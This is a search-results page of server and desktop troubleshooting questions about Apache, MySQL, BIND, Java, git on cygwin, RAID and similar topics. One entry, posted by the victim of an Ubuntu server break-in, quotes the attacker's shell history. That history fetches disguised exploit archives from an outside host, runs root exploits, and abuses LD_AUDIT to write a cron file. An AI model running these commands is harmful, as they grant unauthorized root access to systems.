Search Results

Search found 7323 results on 293 pages for 'cache manifest'.

Page 236/293 | < Previous Page | 232 233 234 235 236 237 238 239 240 241 242 243  | Next Page >

  • ClassNotFoundException returned for all plugins

    - by razumny
    I am trying to use a Java applet (any Java Applet), but I always get a messages saying "Error. Click for details". When I do so, the pop-up says: Application Error ClassNotFoundException jreVerification.class When I click the "Details" button, all I see is the following: Java Plug-in 10.7.2.10 Using JRE version 1.7.0_07-b10 Java HotSpot(TM) Client VM User home directory = C:\Users\razumny ---------------------------------------------------- c: clear console window f: finalize objects on finalization queue g: garbage collect h: display this help message l: dump classloader list m: print memory usage o: trigger logging q: hide console r: reload policy configuration s: dump system and deployment properties t: dump thread list v: dump thread stack x: clear classloader cache 0-5: set trace level to <n> ---------------------------------------------------- I am running Windows 7 Professional, and am up to date on patches. The problem occurs in Google Chrome, Mozilla Firefox and Internet Explorer, regardless of what Java Applet I am running. The error I quoted above came from here: http://java.com/en/download/installed.jsp?detect=jre I have attempted the following to rectify the issue: Uninstall and reinstall Java Uninstall Java, reboot, install Java Uninstall Java, delete all registry entries, reboot, install Java In addition, I have run Malware and Virus scans, none of which have shown anything of relevance. At this point, I am at my wit's end, and so, I turn to you.

    Read the article

  • Why is my apache2, mod_fcgid, php configuration causing 100% cpu usage?

    - by Scott Lundgren
    Page load makes a quick initial connection, then hangs about 10 seconds before the page renders. When the server load goes up I start watching top & I see that both CPUs get pegged at times to 100% by between 4-8 processes of php-cgi. My theory is that since I never see RAM usage never go above 50%, that apache is able to handle the requests coming in, but is queueing them for PHP to process. What is wrong with my mod_fcgid/php configuration ? RHEL 5.4 2 Xeon E5420s @ 2.50 Ghz 4 Gb RAM Apache 2.2.3 Timeout 30 KeepAlive On MaxKeepAliveRequests 0 KeepAliveTimeout 5 <IfModule worker.c> StartServers 2 MaxClients 300 MinSpareThreads 25 MaxSpareThreads 75 ThreadsPerChild 25 MaxRequestsPerChild 0 </IfModule> mod_fcgid 2.2.10 LoadModule fcgid_module modules/mod_fcgid.so <IfModule !mod_fastcgi.c> AddHandler fcgid-script fcg fcgi fpl php </IfModule> SocketPath run/mod_fcgid SharememPath run/mod_fcgid/fcgid_shm DefaultInitEnv PHPRC "/etc/" FCGIWrapper /usr/bin/php-cgi .php MaxRequestsPerProcess 1500 MaxProcessCount 20 IPCCommTimeout 240 IdleTimeout 240 APC 3.0.19 extension = apc.so apc.enabled=1 apc.shm_segments=1 apc.optimization=0 apc.shm_size=32 apc.ttl=7200 APC cache is 43% used with a 99% hit rate

    Read the article

  • MySQL is killing the server IO.

    - by OneOfOne
    I manage a fairly large/busy vBulletin forums (running on gigenet cloud), the database is ~ 10 GB (~9 milion posts, ~60 queries per second), lately MySQL have been grinding the disk like there's no tomorrow according to iotop and slowing the site. The last idea I can think of is using replication, but I'm not sure how much that would help and worried about database sync. I'm out of ideas, any tips on how to improve the situation would be highly appreciated. Specs : Debian Lenny 64bit ~12Ghz (6 cores) CPU, 7520gb RAM, 160gb disk. Kernel : 2.6.32-4-amd64 mysqld Ver 5.1.54-0.dotdeb.0 for debian-linux-gnu on x86_64 ((Debian)) Other software: vBulletin 3.8.4 memcached 1.2.2 PHP 5.3.5-0.dotdeb.0 (fpm-fcgi) (built: Jan 7 2011 00:07:27) lighttpd/1.4.28 (ssl) - a light and fast webserver PHP and vBulletin are configured to use memcached. MySQL Settings : [mysqld] key_buffer = 128M max_allowed_packet = 16M thread_cache_size = 8 myisam-recover = BACKUP max_connections = 1024 query_cache_limit = 2M query_cache_size = 128M expire_logs_days = 10 max_binlog_size = 100M key_buffer_size = 128M join_buffer_size = 8M tmp_table_size = 16M max_heap_table_size = 16M table_cache = 96 Other : > vmstat procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu---- r b swpd free buff cache si so bi bo in cs us sy id wa 9 0 73140 36336 8968 1859160 0 0 42 15 3 2 6 1 89 5 > /etc/init.d/mysql status Threads: 49 Questions: 252139 Slow queries: 164 Opens: 53573 Flush tables: 1 Open tables: 337 Queries per second avg: 61.302. Edit Additional info.

    Read the article

  • Apache in OS X not displaying localhost nor vhosts correctly

    - by Marcus
    I've encountered a really odd problem in my development environment, and I really can't make any sense of it. It started by a locally developed PHP-site refused to update any content I edited in a file – no text or nothing. So if the document was: <h2>Hello!</h2> and I edited it to <h2>What's wrong?!</h2> it still outputed <h2>Hello!</h2>. I thought is was some kind of cache:ing problem, but no "hard reloads" in the browser nor sudo apachectl -k restart sorted it out. Only a restart of my Mac did finally fix it. Now, a few days later even stranger issues are appearing. I have a LAMP-stack installed via Homebrew, in httpd-vhosts.conf I've set ~/Dev/ as my localhost, and I set up a <VirtualHost *80> for each project ("ServerName projectname.dev" for example). However, what ever files of folder I put in ~/Dev/ have stopped showing up on localhost, and new VirtualHost-directives doesn't work. Three projects + "docs" in the folder: But "localhost" only displays the two older projects...? So, as I've said – I've tried restarting Apache (without errors), clearing browser caches (tried in three browsers, Chrome, Safari and Firefox) and ever rebooting the Mac. Nothing. Any ideas? Running OS X 10.8.5 and Apache 2.2.24.

    Read the article

  • Problems forwarding zone to another DNS server.

    - by sebastian nielsen
    I have a authorative DNS server at 83.248.21.18 which are authorative for the domain "finahemgoteborg.se". Now my registrar is requiring me to have 2 DNS servers for the domain, so I would now want the machine 85.228.103.141 just forward all incoming queries for "finahemgoteborg.se" to the 83.248.21.18 server. In the 85.228.103.141 BIND server, I have the following config: zone "finahemgoteborg.se" in { type forward; forwarders {83.248.21.18;}; }; But the problem is that 85.228.103.141 is still responding with "REFUSED" when querying it for example www.finahemgoteborg.se A record. How can I fix it. I do NOT want to set up a master/slave situation, just one nameserver that forwards to a another. Edit The Rest of named.conf: options { directory "/var/cache/bind"; version "none"; allow-recursion {"none";}; minimal-responses no; }; zone "sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "ns1sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "ns2sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "finahemgoteborg.se" in{ type forward; forwarders {83.248.21.18;}; };

    Read the article

  • I cannot access Windows Update at all

    - by Cardinal fang
    I have been unable to access the Windows update site for a couple of weeks now. I just get a message saying "Internet Explorer cannot display the webpage" and saying I have connection problems. Same thing is replicated with any other Microsoft site I try to access. The Automatic Updates also do not work. I can access every other wesbite I've surfed to. I've tried Googling the problem and based on what other site have suggested I have cleared my cache and temp files. I've scanning my hard drive with my antivirus in case I have a virus (nada). I've tried turning off my firewall and anti-virus (I run Zone Alarm). I've downloaded SpyBot and scanned my drive with that in case something was missed by Zone Alarm (again nada). Based on suggestions from the smart cookies on the Bad Science forum, I've used nslookup to check my translation isn't wonky (got all the info they said I should get). I've also tried navigating there directly using the IP address I was given (nope). I normally access the internet through a 3 mobile broadband connection, but have also tried connecting using a mate's wi-fi connection in case it was something on my mobile modem interferring. I run Windows XP SP3 with Internet Explorer 7 and Zone Alarm Internet Security Suite as my anti-virus/ firewall. Any suggestions?

    Read the article

  • getent passwd fails, getent group works?

    - by slugman
    I've almost got my AD integration working completely on my OpenSUSE 12.1 server. I have a OpenSUSE 11.4 system successfully integrated into our AD environment. (Meaning, we use ldap to authenticate to AD directory via kerberos, so we can login to our *nix systems via AD users, using name service caching daemon to cache our passwords and groups). Also, important to note these systems are in our lan, ssl authentication is disabled. I am almost all the way there. Nss_ldap is finally authenticating with ldap server (as /var/log/messages shows), but right now, I have another problem: getent passwd & getent shadow fails (shows local accounts only), but getent group works! Getent group shows all my ad groups! I copied over the relavent configuration files from my working OpenSUSE 11.4 box: /etc/krb5.conf /etc/nsswitch.conf /etc/nscd.conf /etc/samba/smb.conf /etc/sssd/sssd.conf /etc/pam.d/common-session-pc /etc/pam.d/common-account-pc /etc/pam.d/common-auth-pc /etc/pam.d/common-password-pc I didn't modify anything between the two. I really don't think I need to modify anything, because getent passwd, getent shadow, and getent group all works fine on the OpenSUSE11.4 box. Attempting to restart nscd service unfortunately didn't do much, and niether did running /usr/sbin/nscd -i passwd. Do any of you admin-gurus have any suggestions? Honestly, I'm happy I made it this far. I'm almost there guys!

    Read the article

  • Ubuntu Server hack

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

    Read the article

  • setting up git on cygwin - openssl

    - by Pete Field
    I'm trying to get git running in cygwin on a windows 7 machine I have git unpacked and the directory git-1.7.1.1 when i run make install from within that directory, I get CC fast-import.o In file included from builtin.h:4, from fast-import.c:147: git-compat-util.h:136:19: iconv.h: No such file or directory git-compat-util.h:140:25: openssl/ssl.h: No such file or directory git-compat-util.h:141:25: openssl/err.h: No such file or directory In file included from builtin.h:6, from fast-import.c:147: cache.h:9:21: openssl/sha.h: No such file or directory In file included from fast-import.c:156: csum-file.h:10: error: parse error before "SHA_CTX" csum-file.h:10: warning: no semicolon at end of struct or union csum-file.h:15: error: 'crc32' redeclared as different kind of symbol /usr/include/zlib.h:1285: error: previous declaration of 'crc32' was here csum-file.h:15: error: 'crc32' redeclared as different kind of symbol /usr/include/zlib.h:1285: error: previous declaration of 'crc32' was here csum-file.h:17: error: parse error before '}' token fast-import.c: In function `store_object': fast-import.c:995: error: `SHA_CTX' undeclared (first use in this function) fast-import.c:995: error: (Each undeclared identifier is reported only once fast-import.c:995: error: for each function it appears in.) fast-import.c:995: error: parse error before "c" fast-import.c:1000: warning: implicit declaration of function `SHA1_Init' fast-import.c:1000: error: `c' undeclared (first use in this function) fast-import.c:1001: warning: implicit declaration of function `SHA1_Update' fast-import.c:1003: warning: implicit declaration of function `SHA1_Final' fast-import.c: At top level: fast-import.c:1118: error: parse error before "SHA_CTX" fast-import.c: In function `truncate_pack': fast-import.c:1120: error: `to' undeclared (first use in this function) fast-import.c:1126: error: dereferencing pointer to incomplete type fast-import.c:1127: error: dereferencing pointer to incomplete type fast-import.c:1128: error: dereferencing pointer to incomplete type fast-import.c:1128: error: `ctx' undeclared (first use in this function) fast-import.c: In function `stream_blob': fast-import.c:1140: error: `SHA_CTX' undeclared (first use in this function) fast-import.c:1140: error: parse error before "c" fast-import.c:1154: error: `pack_file_ctx' undeclared (first use in this functio n) fast-import.c:1154: error: dereferencing pointer to incomplete type fast-import.c:1160: error: `c' undeclared (first use in this function) make: *** [fast-import.o] Error 1 I'm guessing that most of these errors are due to the iconv.h and openssl files which apparently are missing, but I can't figure out how I'm supposed to install those (if I am), or if there is some other way to get around this.

    Read the article

  • Interruptionless Uploads / Rollback in IIS

    - by NickatUship
    I'm not sure if this is the right way to ask this question, but here's basically what i'd like to do: 1.) Push a changeset to a site in IIS. 2.) Don't interrupt the users. 3.) Be able to roll back effortlessly. So, there are a few things that I know have to happen: 1.) Out of Proc session - handled 2.) Out of Proc cache - handled So the questions that remain: 1.) How do i keep from interrupting the users? If i just upload the files to bin, the app recycles and takes 10+ seconds to come back online 2.) How do i roll back effortlessly? I was thinking a possible solution would be to have two sites set up in IIS, one public and one private. Uploads go to private and get warmed up. After warmup, the sites are swapped. A rollback only entails swapping to private without an upload. This seems sound in theory, but Im not sure of the mechanics. Any ideas?

    Read the article

  • How do you enable view source in ie8 when it gets magically diabled

    - by Tim Meers
    I have multiple computers that all seem to have View Source disabled from the content menu when you right click on a web page. Now I know it's not that the web page is some how disabling it, I'm pretty sure thats not even possible. But alas I have at least 3 machines in my office (not on AD) that have this problem. I have also worked on clients computers that have this same issue. It's down right maddening! I tried to Google for it, but it just shows results from the dawn of IE6 in all of it's "glory" with a bug where if the cache was full it would be disabled. But this is not the case in IE8. Any body have a clue why this is happening, or a fix for it? Maybe a reg setting? Update: So I got a little closer to solving it, but there was still an issue on one computer where it allowed it not is HTTP, but not in HTTPS. One other computer works correctly in both. I Found these two keys missing in the registry: [-HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\View Source Editor] [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\View Source Editor]

    Read the article

  • Disable RAID to JBOD in server IBM x3400 M2

    - by BanKtsu
    Hi I just wanna disable the default RAID in my server IBM System X3400 M2 Server(7837-24X),i have 3 disk drives SAS. I want to make them a JBOD "Just a Bunch Of Disks", because I want to install in the drive 0 CentOS, and the other two make them cache files for a squid server. I disable the RAID in the BIOS: System Settings/Adapters and UEFI drivers/LSI Logic Fusion MPT SAS Driver -PciRoot(0x0)/Pci(0x3,0X0)/Pci(0x0,0x0) LSI Logic MPT Setup Utility RAID Properties/Delete Array Later I boot the CentOS live CD and install the OS in the drive 0, and the others 2 mounted like this: *LVM Volume Groups vg_proxyserver 139508 lv_root 51200 / ext4 lv_home 84276 /home ext4 lv_swap 4032 Hard Drive sdb(/dev/sdb) free 140011 sdc(/dev/sdc) free 140011 sdd(/dev/sdd) sdd1 500 /boot ext4 sdd2 139512 vg_proxyserver physical volume(LVM) But when I restart the server give me the error: Boot failed Hard Disk 0 UEFI PXE PciRoot(0x0)/Pci(0x1,0X0)/Pci(0x0,0x0)/MAC(001A64B15130,0X0)) ........PXE-E18:Server response timeout. UEFI PXE PciRoot(0x0)/Pci(0x1,0X0)/Pci(0x0,0x0)/MAC(001A64B15132,0X0)) ........PXE-E18:Server response timeout. and the OS not start. The IBM force me to do a RAID?,why?

    Read the article

  • Roaming Profiles & Redirected Folders - storage consumption? offline files and caching?

    - by Ben Swinburne
    I understand the concepts of both roaming profiles and folder redirection and have used both separately before. I am about to set up a network from scratch and would ideally like to use both for the following reasons primarily Roaming profiles allow users to log on to any machine and have their profile Redirected profiles allow users to have their My Documents and Desktop etc backed up without the need to log off at the end of the day. The servers can run their backups overnight and there are no missing files due to the user not logging off. Redirected profiles largely alleviate the slow log in times caused by large profiles. My question is if some of the folders are redirected and therefore not part of the roaming profile what happens on machines which truly roam (i.e. laptops)? If there's offline files or a cache does this mean that the problem whereby a user has to log off comes back? By having them both enabled, is there any duplication i.e. if I have a users$ share and a profiles$ share would I have Desktop twice for example?

    Read the article

  • How can I get Haproxy to not log local requests?

    - by coneybeare
    I am trying to clean out some of the log clutter from my machines and am starting by removing requests that are generated from the server themselves. I have cache warmers running around the clock and I don't want these polluting the logs. I was able to get apache to stop logging local requests by adding a dontlog for the local IP: SetEnvIf Remote_Addr "RE\.DA\.CT\.ED" dontlog CustomLog "|logger -p local3.info -t http" combined env=!dontlog and now I am looking for something similar to put in a configuration for the Haproxy log. How can I prevent 127.0.0.1 requests from writing to the Haproxy log? UPDATE: 2/15/11 I use the excellent loggly service to pull out logs in the cloud, but I am seeing tons of logs like this: 2011 Feb 15 06:09:42.000 ip-10-251-194-96 http: RE.DA.CT.ED - - [15/Feb/2011:06:09:42 -0500] "HEAD /search/Nevad/predictive/txt HTTP/1.0" 200 - "-" "Wget/1.10.2 (Red Hat modified)" 2011 Feb 15 06:09:42.000 127.0.0.1 haproxy[10390]: 127.0.0.1:58408 [15/Feb/2011:06:09:42] www i-5dd7a331.0 0/0/0/8/8 200 210 - - --NI 0/0/0 0/0 "HEAD /search/Nevad/predictive/txt HTTP/1.1" and I want them gone. This question focuses on how to remove that haproxy log line from writing to the server side log in the first place.

    Read the article

  • site to listen on port 88

    - by JohnMerlino
    I want to get one of my sites to listen on port 88. In ports.conf in /etc/apache2 on ubuntu server, I add so web app can listen on port 88: NameVirtualHost *:80 Listen 80 NameVirtualHost *:88 Listen 88 I have this in my etc/apache2/apache2.conf, I have this: # Include the virtual host configurations: Include sites-enabled/ Under sites enabled, I have a file looks like this: Listen *:88 NameVirtualHost *:88 <VirtualHost *:88> ServerName dogtracking.com DocumentRoot /home/doggps/public_html/eaglegps.com/current/public <Directory /home/doggps/public_html/eaglegps.com/current/public> AllowOverride all Options -MultiViews </Directory> <LocationMatch "^/assets/.*$"> Header unset ETag FileETag None # RFC says only cache for 1 year ExpiresActive On ExpiresDefault "access plus 1 year" </LocationMatch> </VirtualHost> Then I try to restart apache: /etc/init.d/apache2 restart And I get: * Restarting web server apache2 /usr/sbin/apache2ctl: line 87: ulimit: open files: cannot modify limit: Operation not permitted Warning: DocumentRoot [/home/xtreme/Sites/DogGPS-CMS] does not exist apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName [Thu Oct 18 18:04:21 2012] [warn] NameVirtualHost *:88 has no VirtualHosts /usr/sbin/apache2ctl: line 87: ulimit: open files: cannot modify limit: Operation not permitted Warning: DocumentRoot [/home/xtreme/Sites/DogGPS-CMS] does not exist apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName [Thu Oct 18 18:04:22 2012] [warn] NameVirtualHost *:88 has no VirtualHosts (13)Permission denied: make_sock: could not bind to address 0.0.0.0:80 no listening sockets available, shutting down Unable to open logs Action 'start' failed.

    Read the article

  • CC.NET + SVN : Server certificate issue

    - by MSI
    I am trying to setup Continuous Integration in our office. Being a puny little developer I am facing this supposedly infamous problem: " Source control operation failed: svn: OPTIONS of 'https://trunkURL': Server certificate verification failed: issuer is not trusted" So I tried the following solution - Run CC.NET service (server running as win service) using a domain account (rather than default LOCAL SYSTEMS) and accept cert permanently using command prompt under that user by using svn log/list on the repo. Doesn't help :(. I am getting the following from my artifact/log files(or dashboard) ThoughtWorks.CruiseControl.Core.CruiseControlException: Source control operation failed: svn: OPTIONS of 'https://TrunkURL': Server certificate verification failed: issuer is not trusted (https://ServerAdd) . Process command: E:\(svn.exe Path) log https://TrunkURL -r "{2010-11-08T02:12:20Z}:{2010-11-08T02:13:21Z}" --verbose --xml --no-auth-cache --non-interactive at ThoughtWorks.CruiseControl.Core.Sourcecontrol.ProcessSourceControl.Execute(ProcessInfo processInfo) at ThoughtWorks.CruiseControl.Core.Sourcecontrol.Svn.GetModifications(IIntegrationResult from, IIntegrationResult to) at ThoughtWorks.CruiseControl.Core.Sourcecontrol.QuietPeriod.GetModificationsWithLogging(ISourceControl sc, IIntegrationResult from, IIntegrationResult to) at ThoughtWorks.CruiseControl.Core.Sourcecontrol.QuietPeriod.GetModifications(ISourceControl sourceControl, IIntegrationResult lastBuild, IIntegrationResult thisBuild) at ThoughtWorks.CruiseControl.Core.IntegrationRunner.GetModifications(IIntegrationResult from, IIntegrationResult to) at ThoughtWorks.CruiseControl.Core.IntegrationRunner.Integrate(IntegrationRequest request) We are using VisualSVN Server and CC.NET for this adventure. Tips, suggestions will be highly appreciated. Thanks

    Read the article

  • setup lowcost image storage server with 24x SSD array to get high IOPS?

    - by Nenad
    I want to build let's name it a lowcost Ra*san which would host for our social site the images (many millions) we have 5 sizes of every photo with 3 KB, 7 KB, 15 KB, 25 KB and 80 KB per Image. My idea is to build a Server with 24x consumer 240 GB SSD's in Raid 6 which will give me some 5 TB Disk space for the photo storage. To have HA I can add a 2nd one and use drdb. I'm looking to get above 150'000 IOPS (4K Random reads). As we mostly have read access only and rarely delete photos i think to go with consumer MLC SSD. I read many endurance reviews and don't see there a problem as long we don't rewrite the cells. What you think about my idea? - I'm not sure between Raid 6 or Raid 10 (more IOPS, cost SSD). - Is ext4 OK for the filesystem - Would you use 1 or 2 Raid controller, with Extender Backplane If anyone has realized something similar i would be happy to get Real World numbers. UPDATE I have buy 12 (plus some spare) OCZ Talos 480GB SAS SSD Drive's they will be placed in a 12-bay DAS and attached to a PERC H800 (1GB NV Cache, manufactured by LSI with fastpath) Controller, I plan to setup Raid 50 with ext4. If someone is wondering about some benchmarks let me know what you would like to see.

    Read the article

  • Use subpath internal proxy for subdomains, but redirect external clients if they ask for that subpath?

    - by HostileFork
    I have a VirtualHost that I'd like to have several subdomains on. (For the sake of clarity, let's say my domain is example.com and I'm just trying to get started by making foo.example.com work, and build from there.) The simplest way I found for a subdomain to work non-invasively with the framework I have was to proxy to a sub-path via mod_rewrite. Thus paths would appear in the client's URL bar as http://foo.example.com/(whatever) while they'd actually be served http://foo.example.com/foo/(whatever) under the hood. I've managed to do that inside my VirtualHost config file like this: ServerAlias *.example.com RewriteEngine on RewriteCond %{HTTP_HOST} ^foo\.example\.com [NC] # <--- RewriteCond %{REQUEST_URI} !^/foo/.*$ [NC] # AND is implicit with above RewriteRule ^/(.*)$ /foo/$1 [PT] (Note: It was surprisingly hard to find that particular working combination. Specifically, the [PT] seemed to be necessary on the RewriteRule. I could not get it to work with examples I saw elsewhere like [L] or trying just [P]. It would either not show anything or get in loops. Also some browsers seemed to cache the response pages for the bad loops once they got one... a page reload after fixing it wouldn't show it was working! Feedback welcome—in any case—if this part can be done better.) Now I'd like to make what http://foo.example.com/foo/(whatever) provides depend on who asked. If the request came from outside, I'd like the client to be permanently redirected by Apache so they get the URL http://foo.example.com/(whatever) in their browser. If it came internally from the mod_rewrite, I want the request to be handled by the web framework...which is unaware of subdomains. Is something like that possible?

    Read the article

  • datawind ubislate 9ci tablet computer hanging on boot

    - by user57924
    I am new to this forum. I purchased a new tablet Datawind Ubislate 9ci. It is a 9 inch no-bluetooth tablet. Details: Android 4.1.1 Rock chip RK2928 KERNEL linux version 3.0.36 I was trying to install CWM through mobile odin and ROM manager but my tablet was not supported so i downloaded build.prop editor from google play and changed it to some other cwm recognizable model viz. Samsung, nexus etc. When i was doing the above mentioned procedure, suddenly my tablet is coming up to bootloading and hanging there only and not opening i went to recovery and tried to do wipe data factory reset but failed to get opened after boot android system recovery(3e) has the following options 1)reboot system now 2)apply update from ADB 3)apply update from external storage 4)update rkimage from external storage 6)wipe data factory reset 7)wipe cache partition 8)recovery system from back up i tried to do wipe data factory reset 2-3 times but still hanging at boot i had not made any back up before this bootloop and also tried hard reset by pressing needle at the back please somebody help me to get rid of this problem and also tell me how to unlock bootloader thank you

    Read the article

  • Updated my WAMP Server and MySQL is eating up 580mB of memory

    - by Jon
    I updated my dev-box's WAMPSERVER, and along with updating PHP and Apache, MySQL updated to '5.6.12'. After doing that, I copied the data folder from my old (5.1.36) install to the new one and now MySQL takes up 580mB which is way too much, since I'm the only person using it (Locally) and there are only 20 or so databases on it, none of which have 'memory' tables. How can I get this down to a decent amount? My my.ini: # For advice on how to change settings please see # http://dev.mysql.com/doc/refman/5.6/en/server-configuration-defaults.html # *** DO NOT EDIT THIS FILE. It's a template which will be copied to the # *** default location during install, and will be replaced if you # *** upgrade to a newer version of MySQL. [mysqld] # Remove leading # and set to the amount of RAM for the most important data # cache in MySQL. Start at 70% of total RAM for dedicated server, else 10%. # innodb_buffer_pool_size = 128M # Remove leading # to turn on a very important data integrity option: logging # changes to the binary log between backups. # log_bin # These are commonly set, remove the # and set as required. # basedir = ..... # datadir = ..... # port = ..... # server_id = ..... # Remove leading # to set options mainly useful for reporting servers. # The server defaults are faster for transactions and fast SELECTs. # Adjust sizes as needed, experiment to find the optimal values. # join_buffer_size = 128M # sort_buffer_size = 2M # read_rnd_buffer_size = 2M sql_mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES Database info: Storage Engine Data Size Index Size Total Size InnoDB 48.00 KB 0.00 B 48.00 KB MEMORY 0.00 B 0.00 B 0.00 B MyISAM 163.64 MB 122.49 MB 286.13 MB Total 163.69 MB 122.49 MB 286.18 MB

    Read the article

  • Google bots are severely affecting site performance

    - by Lynn
    I have an aggregate site on a linux server that pulls in feeds from a universe of about 2,000 blogs. It's in Wordpress 3.4.2 and I have a cron job that is staggered to run five times an hour on another server to pull in the stories and then publish them to the front page of this site. This is so I didn't put too much pressure all on one server. However, the Google bots, which visit a few times every hour bring the server to its knees in the morning and evenings when there is an increase in traffic on the site. The bots have something like 30,000 links to follow at this point. How do I throttle the bots to simply grab the new stories off the front page and stop there? EDIT- Details of my server configuration: The way we have this set up is the server that handles all the publishing is an unmanaged instance via AWS. It mounts the NFS server and connects to the RDS to update content, etc. You get to this publishing instance via a plugin that detects the wp-admin link and then redirects you into there. The front end app server also mounts the NFS and requests data from the RDS. It is the only one that has the WP Super Cache on it.... The OS is Ubuntu on the App server and the NFS runs CentOs. The front end is Nginx and the publishing server is Apache.

    Read the article

  • What are these isolated resource requests in Apache's access_log?

    - by Greg
    I was looking at my Apache access log and came across some strange requests. A single IP address will access several resources (mostly css style sheets and images), but no actual pages. Sometimes they are requesting a resource that no longer exists on the server, or one that is still under the web root but no longer used (e.g. a resource in an old WordPress theme). Also: The requests list no referrer I get no useful information on the IP address by looking it up There doesn't seem to be any pattern among the IP addresses that are making these requests (e.g. different countries) Are these just links from a stale cache somewhere? Could it be a sign of an attack of some sort? Here is a typical example: GET /wp-content/themes/my-theme/images/old-image.gif HTTP/1.1" 500 809 "-" "Mozilla/4.0 (compatible;)" This was one of about 10 similar requests, some for existing resources, some for older resources. There is no other sign of this IP address in access_log. Note the internal server error, which is a topic for a different thread. What I'm asking here is where would isolated requests like this come from?

    Read the article

  • How Do I Stop NFS Clients from Using All of the NFS Server's Resources?

    - by Ken S.
    I have a v4 NFS server running on Ubuntu 12.04LTS. It is the main repository for the web assets that four external nginx webservers mount to serve up to site visitors. These client servers connect to it via a read-only mount. Each of these RO servers has this displayed when I check the mounts: 10.0.0.90:/assets on /var/www/assets type nfs4 (ro,addr=10.0.0.90,clientaddr=0.0.0.0) The NFS master's /etc/exports file contains entries like this for each server: /mnt/lvm-ext4 10.0.0.40(ro,fsid=0,insecure,no_subtree_check,async) The problem that I'm seeing is that these clients are eventually utilizing all the RAM on the NFS server and causing it to crash. If I do a watch free -m I can watch the used memory creep up until it's used and then see the free buffers/cache entry creep down to near zero before the server eventually locks up requiring a reboot. There is some sort of memory leak somewhere that is causing this, and the optimal solution would be to find it and fix it, but in the meantime I need to find a way to have the NFS server protect itself from connected clients using all it's RAM. There must be some sort of setting that limits the resources the clients can use, but I can't seem to find it. I've tried adjusting the values for rsize and wsize but they don't seem to help or be related. Thanks for any tips.

    Read the article

  • Move OS from RAID5 array to RAID 1 arrays

    - by Antoine
    I want to give a last boost to my old ProLiant ML350 G5 server which just needs to be reliable for a few more year only ! With a defined budget of about 1500$ (I do not have more), i plan to replace the CPU (+ adding a second one), the battery cache of my raid controller (E200i), double the RAM, and change all hard drives. I have 7 HDD (SAS 10krpm, 72Gb) + 1 spare in RAID5, and my system is all FULL (no empty tray, full disks). in my current RAID5 array, I have 2 partitions: - 1 OS partition, 20Gb - 1 data partition, 350 Gb I plan to replace these 8 disks with : - 2 x 300Gb SAS 15krpm in RAID 1 (= 1 partition for OS) - 2 x 2Tb SATA 7.2krpm in RAID 1 (= 1 partition for DATA) My biggest constraint is that I have only 01 day to upgrade my server. Therefore, I'm looking for cloning all my files (OS + data partition) to my new arrays, i.e : - the OS partition shall be cloned to the RAID1 "2x300Gb array" - the data partition shall be cloned to the RAID1 "2x2Tb array" My second problem is that I need to physically remove all the old hard drives before inserting the new ones. I'm running Windows Server 2003 R2, and even if MS support will expire soon, I cannot buy a new licence and spent time in configuration. Obviously, with 1500$, I cannot also buy a new server that I could start configuring from now ! Thought about ASR (NTBackup), but I have no floppy drive (and do not really want to invest in one !) Thought about a clonezilla clone, and read this interesting link : Windows Server 2003 - move C: partition to a new SAS disk , but i'm not so confident in using Clonezilla with RAID5. What should be the best option to quickly and easily (if possible!) "copy/paste" my OS (so no need to reinstall and reconfigure all) and DATA / programs / services, etc... ? Thanks for your comments

    Read the article

  • Apache reverse proxy with VirtualHost not serving a page

    - by Mr Aleph
    I have an Apache reverse proxy set to move requests to a Tomcat Applet. The config is similar to: <VirtualHost 100.100.100.100:80> ProxyPass /AppName/App http://1.1.1.1/AppName/App ProxyPassReverse /AppName/App http://1.1.1.1/AppName/App </VirtualHost> I also have a page called summary.html that exists on 1.1.1.1 as: http://1.1.1.1/AppName/summary.html When I browse directly to it I have no problem viewing it, however if I try to get there via the reverse proxy I get a blank page. Wireshark shows me a 503, but this one is coming from the Apache reverse proxy (IP 100.100.100.100) and not the Tomcat (IP 1.1.1.1). Should I add http://1.1.1.1/AppName/ to the config? How? I tried it but I get a blank page, however this one shows on the URL bar of the browser the internal IP of the Tomcat, so, no go. Help is appreciated. Thanks. EDIT: This is the dump from Wireshark: GET /AppName/ HTTP/1.1 Host: 100.100.100.100 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cache-Control: max-age=0 Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 404 Not Found Date: Tue, 30 Jan 2012 09:08:51 GMT Server: Apache 